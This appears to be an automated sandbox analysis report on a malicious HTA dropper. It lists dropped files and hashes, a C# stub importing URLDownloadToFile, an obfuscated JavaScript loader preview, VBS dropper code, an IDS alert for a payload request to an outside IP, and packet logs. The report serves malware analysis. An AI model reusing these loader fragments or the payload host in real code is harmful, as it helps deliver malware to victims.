                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pljapn4x.hno.ps1

                                  Download File
                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tcmxgj35.r32.psm1

                                  Download File
                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_w5mmzdje.0bl.ps1

                                  Download File
                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                  C:\Users\user\AppData\Local\Temp\ly0yjdqb\CSC746F8121F2314519843BE09F69B09E4D.TMP

                                  Download File
                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                  File Type:MSVC .res
                                  Category:dropped
                                  Size (bytes):652
                                  Entropy (8bit):3.095003333015504
                                  Encrypted:false
                                  SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryKKak7YnqqB7PN5Dlq5J:+RI+ycuZhNLakStPNnqX
                                  MD5:10CAC908FBEEB5A03265B63F50EE087E
                                  SHA1:49D8538E08E65BBDE728298CCA5E0DB90B26FE46
                                  SHA-256:E02ADF091745B9BFC9E28164AEB653D941C9DE5CEB226B849C5F137AE3D84D46
                                  SHA-512:9A665C637C2397B289ACB2230899B5A4C8B55FF444862BACFCC8A991B6871634CAE7126DA3DC4FB580329C9DE489979C470A2AD24AA681AE487DEC6DC6327D21
                                  Malicious:false
                                  Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...l.y.0.y.j.d.q.b...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...l.y.0.y.j.d.q.b...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

                                  C:\Users\user\AppData\Local\Temp\ly0yjdqb\ly0yjdqb.0.cs

                                  Download File
                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (365)
                                  Category:dropped
                                  Size (bytes):487
                                  Entropy (8bit):3.9164065819276854
                                  Encrypted:false
                                  SSDEEP:6:V/DsYLDS81zuy8GmMelQXReKJ8SRHy4Hbc98eceOCpPG7y:V/DTLDfu0XfH/veEy
                                  MD5:8165DF8B1B6D49C15B5E65811DE25B8C
                                  SHA1:FBE4FE188254B23C8B57B8D1BCD56011A93F34BA
                                  SHA-256:063172FF26517CDF762B144B713C24D423F75C6493234773C0E241C060DFA9F9
                                  SHA-512:EDE5171453ECE61E25BAF3EEF0A842E92A2B2C47C06BD4ED416F9C0A42E2BBC29F1810B97E4041DCDFD53995FC0E268F20A39188DB553CF272B0374994473A2D
                                  Malicious:false
                                  Preview:.using System;.using System.Runtime.InteropServices;..namespace tqOdYPQP.{. public class wNvmpLfFZv. {. [DllImport("URLMon.Dll", CharSet = CharSet.Unicode)]public static extern IntPtr URLDownloadToFile(IntPtr kGDCOyAEvH,string wq,string fHnJOOAgaL,uint fcLWBnX,IntPtr bKg);.. }..}.

                                  C:\Users\user\AppData\Local\Temp\ly0yjdqb\ly0yjdqb.cmdline

                                  Download File
                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (368), with no line terminators
                                  Category:dropped
                                  Size (bytes):371
                                  Entropy (8bit):5.246548520126795
                                  Encrypted:false
                                  SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2923fcV9zxs7+AEszI923fcVY:p37Lvkmb6KzE9WZE2EY
                                  MD5:9AC3929F727C909B52DD452FEDBF377B
                                  SHA1:CF998FB1198E2ABD980B0D5EA91EB844D091AD58
                                  SHA-256:850ACA37E02E06F4FFEE63E2EA0B4BCAF300B8EE5E3E228B844BBD886D5ADE32
                                  SHA-512:1A32BCD43412C7F35AA378AA162B407C0961509CED3073B19996B250FBF0442EB88857570A1598CC3A62D64E74B921329B4256DF490520852BB42BF134013EA8
                                  Malicious:true
                                  Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\ly0yjdqb\ly0yjdqb.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\ly0yjdqb\ly0yjdqb.0.cs"

                                  C:\Users\user\AppData\Local\Temp\ly0yjdqb\ly0yjdqb.dll

                                  Download File
                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                  Category:dropped
                                  Size (bytes):3072
                                  Entropy (8bit):2.86892167185762
                                  Encrypted:false
                                  SSDEEP:24:etGSZpeYYLPl78ex0WkDw0zEtkZfnJTyAFWI+ycuZhNLakStPNnq:66YwPlIe+nw2bJnJ+91ulLa33q
                                  MD5:8041848139DC15460F605199B6EB7D8E
                                  SHA1:E99A180E940AA6C2196791E3E2C855AFBFCC9425
                                  SHA-256:F73B40B7AABE82B6937EF644250EF9E45129AF51D0B313B1077ADECBBD14760A
                                  SHA-512:B0B1D47998A995F4F8850B2ED3E95D3B47800B9044E033EE39C7C13A30ECDFE507899B063AB2C08C9686767AED75EE6F00847249345CE9DA2399AF4854F844C8
                                  Malicious:false
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....!g...........!.................#... ...@....... ....................................@.................................d#..W....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ................................................................(....*BSJB............v4.0.30319......l.......#~......$...#Strings............#US.........#GUID.......L...#Blob...........G.........%3............................................................;.4.......................................".............. B.....P ......T.........Z.....e.....h.....s.....{...T.....T...!.T.....T.......!.....*.......B.......................................+..........<Module>.ly

                                  C:\Users\user\AppData\Local\Temp\ly0yjdqb\ly0yjdqb.out

                                  Download File
                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (449), with CRLF, CR line terminators
                                  Category:modified
                                  Size (bytes):870
                                  Entropy (8bit):5.336347641441775
                                  Encrypted:false
                                  SSDEEP:24:KMoqd3ka6Kz/E2SKax5DqBVKVrdFAMBJTH:doika6a/E2SK2DcVKdBJj
                                  MD5:3B28390DC249C05BDB11FE4B4F9A32B7
                                  SHA1:F14252FE89A0C49E9D727AA5E96563E6D7870B77
                                  SHA-256:CBA9D26093AA8428BAA5D696C926E465947466705E76117A00A908B476E55620
                                  SHA-512:F4FA46DC751DC3995A8191F60B16FE0FE0B9DEDB6519D90DAC41D8705DDC167A9A9613F1406490A9B32FC792D9D386E17CD689A8DC4D2C7BA82840DC8F69A0E3
                                  Malicious:false
                                  Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\ly0yjdqb\ly0yjdqb.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\ly0yjdqb\ly0yjdqb.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

                                  C:\Users\user\AppData\Roaming\seemethebestthingswithgreatneedswithgo.vbs

                                  Download File
                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):141910
                                  Entropy (8bit):3.6703425717520406
                                  Encrypted:false
                                  SSDEEP:1536:eirfggt5pzOGwjqSxVj51Dis9CifP9+z0xG11E6SMWxJRX:eir4gt5pKGwDzjbDislfl+nKMYJRX
                                  MD5:64CC9748329C0E186CACD10D639615E6
                                  SHA1:1291F245B185BD05FB09646B79F284D76E7DC0FF
                                  SHA-256:2C5FFFA8231F572E3A34B8D4CA675AEC062C3ACCFE661519A28E376605C0479D
                                  SHA-512:65CCBFE0223B58675AEF7DE997229F3BA66BE892C851D6CEC9018B941F3A5C5CAC3C41FBE1878474213293AD25059B06E7FF7F0C4E3320D75A6FA7F071B646BA
                                  Malicious:true
                                  Preview:..p.r.i.v.a.t.e. .f.u.n.c.t.i.o.n. .C.r.e.a.t.e.S.e.s.s.i.o.n.(.w.s.m.a.n.,. .c.o.n.S.t.r.,. .o.p.t.D.i.c.,. .e.n.t.r.o.v.i.s.c.a.d.a.)..... . . . .d.i.m. .p.e.l.o.t.a.F.l.a.g.s..... . . . .d.i.m. .c.o.n.O.p.t. ..... . . . .d.i.m. .p.e.l.o.t.a..... . . . .d.i.m. .a.u.t.h.V.a.l..... . . . .d.i.m. .e.n.c.o.d.i.n.g.V.a.l..... . . . .d.i.m. .e.n.c.r.y.p.t.V.a.l..... . . . .d.i.m. .p.w..... . . . .d.i.m. .t.o.u.t..... . . . .'. .p.r.o.x.y. .i.n.f.o.r.m.a.t.i.o.n..... . . . .d.i.m. .p.r.o.x.y.A.c.c.e.s.s.T.y.p.e..... . . . .d.i.m. .p.r.o.x.y.A.c.c.e.s.s.T.y.p.e.V.a.l..... . . . .d.i.m. .p.r.o.x.y.A.u.t.h.e.n.t.i.c.a.t.i.o.n.M.e.c.h.a.n.i.s.m..... . . . .d.i.m. .p.r.o.x.y.A.u.t.h.e.n.t.i.c.a.t.i.o.n.M.e.c.h.a.n.i.s.m.V.a.l..... . . . .d.i.m. .p.r.o.x.y.U.s.e.r.n.a.m.e..... . . . .d.i.m. .p.r.o.x.y.P.a.s.s.w.o.r.d..... . . . . ..... . . . .p.e.l.o.t.a.F.l.a.g.s. .=. .0..... . . . .p.r.o.x.y.A.c.c.e.s.s.T.y.p.e. .=. .0..... . . . .p.r.o.x.y.A.c.c.e.s.s.T.y.p.e.V.a.l. .=. .0..... . . . .p.r.o.x.

                                  Static File Info

                                  General

                                  File type:HTML document, ASCII text, with very long lines (65536), with no line terminators
                                  Entropy (8bit):2.0072434219292554
                                  TrID:
                                    File name:greatthingswithmegood.hta
                                    File size:173'111 bytes
                                    MD5:d61ef0038de65f697abb0b7a21b499db
                                    SHA1:f8facfa18bf5eeecaa0601e8c1690fe60fe02ff8
                                    SHA256:8762a9dea77db2f44207cc9edbc192f5776f7ac8532440ae60a65f5102f8ec93
                                    SHA512:3ce0e7e8302d6b6c23ea209b07640be3b616306494d065c0293885bed194002f92bc41f4329f18465dd0ad77087afa6ce5a30a585e422f08a017306040986223
                                    SSDEEP:48:4vaw5oZz7eWLB2rQOyeoCKcxyeoCKnAWUSl+WmpCzc/xJUdPePmkee7+SfitTFmE:4vG172ICeC4lw/HwSCirCtgQ
                                    TLSH:0D04D764EE714CDCB7DE9987B2FCB2C9B83D674B67CA1E92811F3506E99038C90C1561
                                    File Content Preview:<script language=JavaScript>m='%3Cscript%3E%0A%3C%21--%0Adocument.write%28unescape%28%22%253Cscript%2520language%253DJavaScript%253Em%253D%2527%25253Cscript%25253E%25250A%25253C%252521--%25250Adocument.write%252528unescape%252528%252522%2525253C%25252521D

                                    Network Behavior

                                    Suricata IDS Alerts

                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                    2024-10-30T08:24:09.643172+01002858795ETPRO MALWARE ReverseLoader Payload Request (GET) M21192.168.2.549704198.46.178.15180TCP

                                    Network Port Distribution

                                    TCP Packets

                                    TimestampSource PortDest PortSource IPDest IP
                                    Oct 30, 2024 08:24:08.959028006 CET4970480192.168.2.5198.46.178.151
                                    Oct 30, 2024 08:24:08.966871977 CET8049704198.46.178.151192.168.2.5
                                    Oct 30, 2024 08:24:08.967042923 CET4970480192.168.2.5198.46.178.151
                                    Oct 30, 2024 08:24:08.967236042 CET4970480192.168.2.5198.46.178.151
                                    Oct 30, 2024 08:24:08.974596024 CET8049704198.46.178.151192.168.2.5
                                    Oct 30, 2024 08:24:09.643013000 CET8049704198.46.178.151192.168.2.5
                                    Oct 30, 2024 08:24:09.643038034 CET8049704198.46.178.151192.168.2.5
                                    Oct 30, 2024 08:24:09.643066883 CET8049704198.46.178.151192.168.2.5
                                    Oct 30, 2024 08:24:09.643172026 CET4970480192.168.2.5198.46.178.151
                                    Oct 30, 2024 08:24:09.643177986 CET8049704198.46.178.151192.168.2.5
                                    Oct 30, 2024 08:24:09.643193960 CET8049704198.46.178.151192.168.2.5
                                    Oct 30, 2024 08:24:09.643321037 CET8049704198.46.178.151192.168.2.5
                                    Oct 30, 2024 08:24:09.643338919 CET8049704198.46.178.151192.168.2.5
                                    Oct 30, 2024 08:24:09.643356085 CET8049704198.46.178.151192.168.2.5
                                    Oct 30, 2024 08:24:09.643373013 CET8049704198.46.178.151192.168.2.5
                                    Oct 30, 2024 08:24:09.643383980 CET4970480192.168.2.5198.46.178.151
                                    Oct 30, 2024 08:24:09.643383980 CET4970480192.168.2.5198.46.178.151
                                    Oct 30, 2024 08:24:09.643388033 CET8049704198.46.178.151192.168.2.5
                                    Oct 30, 2024 08:24:09.643393993 CET4970480192.168.2.5198.46.178.151
                                    Oct 30, 2024 08:24:09.643415928 CET4970480192.168.2.5198.46.178.151
                                    Oct 30, 2024 08:24:09.643426895 CET4970480192.168.2.5198.46.178.151
                                    Oct 30, 2024 08:24:09.648793936 CET8049704198.46.178.151192.168.2.5
                                    Oct 30, 2024 08:24:09.648809910 CET8049704198.46.178.151192.168.2.5
                                    Oct 30, 2024 08:24:09.648824930 CET8049704198.46.178.151192.168.2.5
                                    Oct 30, 2024 08:24:09.648888111 CET4970480192.168.2.5198.46.178.151
                                    Oct 30, 2024 08:24:09.648929119 CET4970480192.168.2.5198.46.178.151
                                    Oct 30, 2024 08:24:09.649059057 CET8049704198.46.178.151192.168.2.5
                                    Oct 30, 2024 08:24:09.651031971 CET4970480192.168.2.5198.46.178.151
                                    Oct 30, 2024 08:24:09.762773991 CET8049704198.46.178.151192.168.2.5
                                    Oct 30, 2024 08:24:09.762862921 CET8049704198.46.178.151192.168.2.5
                                    Oct 30, 2024 08:24:09.762876987 CET8049704198.46.178.151192.168.2.5
                                    Oct 30, 2024 08:24:09.762892008 CET8049704198.46.178.151192.168.2.5
                                    Oct 30, 2024 08:24:09.763075113 CET4970480192.168.2.5198.46.178.151
                                    Oct 30, 2024 08:24:09.763075113 CET4970480192.168.2.5198.46.178.151
                                    Oct 30, 2024 08:24:09.768131971 CET8049704198.46.178.151192.168.2.5
                                    Oct 30, 2024 08:24:09.768162012 CET8049704198.46.178.151192.168.2.5
                                    Oct 30, 2024 08:24:09.768177032 CET8049704198.46.178.151192.168.2.5
                                    Oct 30, 2024 08:24:09.768192053 CET8049704198.46.178.151192.168.2.5
                                    Oct 30, 2024 08:24:09.768220901 CET8049704198.46.178.151192.168.2.5
                                    Oct 30, 2024 08:24:09.768243074 CET4970480192.168.2.5198.46.178.151
                                    Oct 30, 2024 08:24:09.768280029 CET4970480192.168.2.5198.46.178.151
                                    Oct 30, 2024 08:24:09.773422956 CET8049704198.46.178.151192.168.2.5
                                    Oct 30, 2024 08:24:09.773438931 CET8049704198.46.178.151192.168.2.5
                                    Oct 30, 2024 08:24:09.773453951 CET8049704198.46.178.151192.168.2.5
                                    Oct 30, 2024 08:24:09.773469925 CET8049704198.46.178.151192.168.2.5
                                    Oct 30, 2024 08:24:09.773494959 CET4970480192.168.2.5198.46.178.151
                                    Oct 30, 2024 08:24:09.773536921 CET4970480192.168.2.5198.46.178.151
                                    Oct 30, 2024 08:24:09.778644085 CET8049704198.46.178.151192.168.2.5
                                    Oct 30, 2024 08:24:09.778660059 CET8049704198.46.178.151192.168.2.5
                                    Oct 30, 2024 08:24:09.778714895 CET4970480192.168.2.5198.46.178.151
                                    Oct 30, 2024 08:24:09.778717995 CET8049704198.46.178.151192.168.2.5
                                    Oct 30, 2024 08:24:09.778733015 CET8049704198.46.178.151192.168.2.5
                                    Oct 30, 2024 08:24:09.778759956 CET4970480192.168.2.5198.46.178.151
                                    Oct 30, 2024 08:24:09.778790951 CET4970480192.168.2.5198.46.178.151
                                    Oct 30, 2024 08:24:09.783987045 CET8049704198.46.178.151192.168.2.5
                                    Oct 30, 2024 08:24:09.784014940 CET8049704198.46.178.151192.168.2.5
                                    Oct 30, 2024 08:24:09.784029961 CET8049704198.46.178.151192.168.2.5
                                    Oct 30, 2024 08:24:09.784044981 CET8049704198.46.178.151192.168.2.5
                                    Oct 30, 2024 08:24:09.784060955 CET8049704198.46.178.151192.168.2.5
                                    Oct 30, 2024 08:24:09.784066916 CET4970480192.168.2.5198.46.178.151
                                    Oct 30, 2024 08:24:09.784099102 CET4970480192.168.2.5198.46.178.151
                                    Oct 30, 2024 08:24:09.789217949 CET8049704198.46.178.151192.168.2.5
                                    Oct 30, 2024 08:24:09.789264917 CET8049704198.46.178.151192.168.2.5
                                    Oct 30, 2024 08:24:09.789279938 CET8049704198.46.178.151192.168.2.5
                                    Oct 30, 2024 08:24:09.789318085 CET4970480192.168.2.5198.46.178.151
                                    Oct 30, 2024 08:24:09.789335012 CET4970480192.168.2.5198.46.178.151
                                    Oct 30, 2024 08:24:09.886090040 CET8049704198.46.178.151192.168.2.5
                                    Oct 30, 2024 08:24:09.886109114 CET8049704198.46.178.151192.168.2.5
                                    Oct 30, 2024 08:24:09.886122942 CET8049704198.46.178.151192.168.2.5
                                    Oct 30, 2024 08:24:09.886224985 CET4970480192.168.2.5198.46.178.151
                                    Oct 30, 2024 08:24:09.886265039 CET8049704198.46.178.151192.168.2.5
                                    Oct 30, 2024 08:24:09.886280060 CET8049704198.46.178.151192.168.2.5
                                    Oct 30, 2024 08:24:09.886409998 CET4970480192.168.2.5198.46.178.151
                                    Oct 30, 2024 08:24:09.886409998 CET4970480192.168.2.5198.46.178.151
                                    Oct 30, 2024 08:24:09.886622906 CET8049704198.46.178.151192.168.2.5
                                    Oct 30, 2024 08:24:09.886768103 CET8049704198.46.178.151192.168.2.5
                                    Oct 30, 2024 08:24:09.886782885 CET8049704198.46.178.151192.168.2.5
                                    Oct 30, 2024 08:24:09.886799097 CET8049704198.46.178.151192.168.2.5
                                    Oct 30, 2024 08:24:09.886821985 CET4970480192.168.2.5198.46.178.151
                                    Oct 30, 2024 08:24:09.886872053 CET4970480192.168.2.5198.46.178.151
                                    Oct 30, 2024 08:24:09.886955976 CET8049704198.46.178.151192.168.2.5
                                    Oct 30, 2024 08:24:09.886970997 CET8049704198.46.178.151192.168.2.5
                                    Oct 30, 2024 08:24:09.887013912 CET4970480192.168.2.5198.46.178.151
                                    Oct 30, 2024 08:24:09.887650013 CET8049704198.46.178.151192.168.2.5
                                    Oct 30, 2024 08:24:09.887665987 CET8049704198.46.178.151192.168.2.5
                                    Oct 30, 2024 08:24:09.887680054 CET8049704198.46.178.151192.168.2.5
                                    Oct 30, 2024 08:24:09.887695074 CET4970480192.168.2.5198.46.178.151
                                    Oct 30, 2024 08:24:09.887734890 CET4970480192.168.2.5198.46.178.151
                                    Oct 30, 2024 08:24:09.887783051 CET8049704198.46.178.151192.168.2.5
                                    Oct 30, 2024 08:24:09.887821913 CET4970480192.168.2.5198.46.178.151
                                    Oct 30, 2024 08:24:09.888382912 CET8049704198.46.178.151192.168.2.5
                                    Oct 30, 2024 08:24:09.888398886 CET8049704198.46.178.151192.168.2.5
                                    Oct 30, 2024 08:24:09.888412952 CET8049704198.46.178.151192.168.2.5
                                    Oct 30, 2024 08:24:09.888447046 CET4970480192.168.2.5198.46.178.151
                                    Oct 30, 2024 08:24:09.888473988 CET4970480192.168.2.5198.46.178.151
                                    Oct 30, 2024 08:24:09.888535976 CET8049704198.46.178.151192.168.2.5
                                    Oct 30, 2024 08:24:09.888550997 CET8049704198.46.178.151192.168.2.5
                                    Oct 30, 2024 08:24:09.888593912 CET4970480192.168.2.5198.46.178.151
                                    Oct 30, 2024 08:24:09.889252901 CET8049704198.46.178.151192.168.2.5
                                    Oct 30, 2024 08:24:09.889269114 CET8049704198.46.178.151192.168.2.5
                                    Oct 30, 2024 08:24:09.889286041 CET8049704198.46.178.151192.168.2.5
                                    Oct 30, 2024 08:24:09.889300108 CET8049704198.46.178.151192.168.2.5
                                    Oct 30, 2024 08:24:09.889303923 CET4970480192.168.2.5198.46.178.151
                                    Oct 30, 2024 08:24:09.889345884 CET4970480192.168.2.5198.46.178.151
                                    Oct 30, 2024 08:24:09.889399052 CET8049704198.46.178.151192.168.2.5
                                    Oct 30, 2024 08:24:09.889440060 CET4970480192.168.2.5198.46.178.151
                                    Oct 30, 2024 08:24:09.890149117 CET8049704198.46.178.151192.168.2.5
                                    Oct 30, 2024 08:24:09.890163898 CET8049704198.46.178.151192.168.2.5
                                    Oct 30, 2024 08:24:09.890187025 CET8049704198.46.178.151192.168.2.5
                                    Oct 30, 2024 08:24:09.890191078 CET4970480192.168.2.5198.46.178.151
                                    Oct 30, 2024 08:24:09.890209913 CET4970480192.168.2.5198.46.178.151
                                    Oct 30, 2024 08:24:09.890222073 CET4970480192.168.2.5198.46.178.151
                                    Oct 30, 2024 08:24:09.890286922 CET8049704198.46.178.151192.168.2.5
                                    Oct 30, 2024 08:24:09.890304089 CET8049704198.46.178.151192.168.2.5
                                    Oct 30, 2024 08:24:09.890326977 CET4970480192.168.2.5198.46.178.151
                                    Oct 30, 2024 08:24:09.890338898 CET4970480192.168.2.5198.46.178.151
                                    Oct 30, 2024 08:24:09.891304016 CET8049704198.46.178.151192.168.2.5
                                    Oct 30, 2024 08:24:09.891330957 CET8049704198.46.178.151192.168.2.5
                                    Oct 30, 2024 08:24:09.891345978 CET8049704198.46.178.151192.168.2.5
                                    Oct 30, 2024 08:24:09.891391039 CET4970480192.168.2.5198.46.178.151
                                    Oct 30, 2024 08:24:09.891450882 CET8049704198.46.178.151192.168.2.5
                                    Oct 30, 2024 08:24:09.891467094 CET8049704198.46.178.151192.168.2.5
                                    Oct 30, 2024 08:24:09.891485929 CET4970480192.168.2.5198.46.178.151
                                    Oct 30, 2024 08:24:09.891515970 CET4970480192.168.2.5198.46.178.151
                                    Oct 30, 2024 08:24:09.892143965 CET8049704198.46.178.151192.168.2.5
                                    Oct 30, 2024 08:24:09.892294884 CET8049704198.46.178.151192.168.2.5
                                    Oct 30, 2024 08:24:09.892311096 CET8049704198.46.178.151192.168.2.5
                                    Oct 30, 2024 08:24:09.892332077 CET8049704198.46.178.151192.168.2.5
                                    Oct 30, 2024 08:24:09.892348051 CET8049704198.46.178.151192.168.2.5
                                    Oct 30, 2024 08:24:09.892355919 CET4970480192.168.2.5198.46.178.151
                                    Oct 30, 2024 08:24:09.892395020 CET4970480192.168.2.5198.46.178.151
                                    Oct 30, 2024 08:24:09.892987013 CET8049704198.46.178.151192.168.2.5
                                    Oct 30, 2024 08:24:09.893030882 CET4970480192.168.2.5198.46.178.151
                                    Oct 30, 2024 08:24:09.893321037 CET8049704198.46.178.151192.168.2.5
                                    Oct 30, 2024 08:24:09.893336058 CET8049704198.46.178.151192.168.2.5
                                    Oct 30, 2024 08:24:09.893351078 CET8049704198.46.178.151192.168.2.5
                                    Oct 30, 2024 08:24:09.893363953 CET4970480192.168.2.5198.46.178.151
                                    Oct 30, 2024 08:24:09.893366098 CET8049704198.46.178.151192.168.2.5
                                    Oct 30, 2024 08:24:09.893381119 CET4970480192.168.2.5198.46.178.151
                                    Oct 30, 2024 08:24:09.893397093 CET4970480192.168.2.5198.46.178.151
                                    Oct 30, 2024 08:24:09.894165993 CET8049704198.46.178.151192.168.2.5
                                    Oct 30, 2024 08:24:09.895456076 CET8049704198.46.178.151192.168.2.5
                                    Oct 30, 2024 08:24:09.895525932 CET4970480192.168.2.5198.46.178.151
                                    Oct 30, 2024 08:24:09.895626068 CET8049704198.46.178.151192.168.2.5
                                    Oct 30, 2024 08:24:09.895639896 CET8049704198.46.178.151192.168.2.5
                                    Oct 30, 2024 08:24:09.895672083 CET4970480192.168.2.5198.46.178.151
                                    Oct 30, 2024 08:24:09.895706892 CET4970480192.168.2.5198.46.178.151
                                    Oct 30, 2024 08:24:10.002744913 CET8049704198.46.178.151192.168.2.5
                                    Oct 30, 2024 08:24:10.002789974 CET8049704198.46.178.151192.168.2.5
                                    Oct 30, 2024 08:24:10.002810001 CET8049704198.46.178.151192.168.2.5
                                    Oct 30, 2024 08:24:10.002826929 CET8049704198.46.178.151192.168.2.5
                                    Oct 30, 2024 08:24:10.002852917 CET8049704198.46.178.151192.168.2.5
                                    Oct 30, 2024 08:24:10.002868891 CET8049704198.46.178.151192.168.2.5
                                    Oct 30, 2024 08:24:10.002883911 CET8049704198.46.178.151192.168.2.5
                                    Oct 30, 2024 08:24:10.002898932 CET8049704198.46.178.151192.168.2.5
                                    Oct 30, 2024 08:24:10.002940893 CET8049704198.46.178.151192.168.2.5
                                    Oct 30, 2024 08:24:10.002948999 CET4970480192.168.2.5198.46.178.151
                                    Oct 30, 2024 08:24:10.002955914 CET8049704198.46.178.151192.168.2.5
                                    Oct 30, 2024 08:24:10.002971888 CET8049704198.46.178.151192.168.2.5
                                    Oct 30, 2024 08:24:10.002988100 CET8049704198.46.178.151192.168.2.5
                                    Oct 30, 2024 08:24:10.002999067 CET4970480192.168.2.5198.46.178.151
                                    Oct 30, 2024 08:24:10.003005981 CET8049704198.46.178.151192.168.2.5
                                    Oct 30, 2024 08:24:10.003022909 CET8049704198.46.178.151192.168.2.5
                                    Oct 30, 2024 08:24:10.003031969 CET4970480192.168.2.5198.46.178.151
                                    Oct 30, 2024 08:24:10.003031969 CET4970480192.168.2.5198.46.178.151
                                    Oct 30, 2024 08:24:10.003038883 CET8049704198.46.178.151192.168.2.5
                                    Oct 30, 2024 08:24:10.003055096 CET8049704198.46.178.151192.168.2.5
                                    Oct 30, 2024 08:24:10.003071070 CET8049704198.46.178.151192.168.2.5
                                    Oct 30, 2024 08:24:10.003081083 CET4970480192.168.2.5198.46.178.151
                                    Oct 30, 2024 08:24:10.003099918 CET4970480192.168.2.5198.46.178.151
                                    Oct 30, 2024 08:24:10.003103971 CET8049704198.46.178.151192.168.2.5
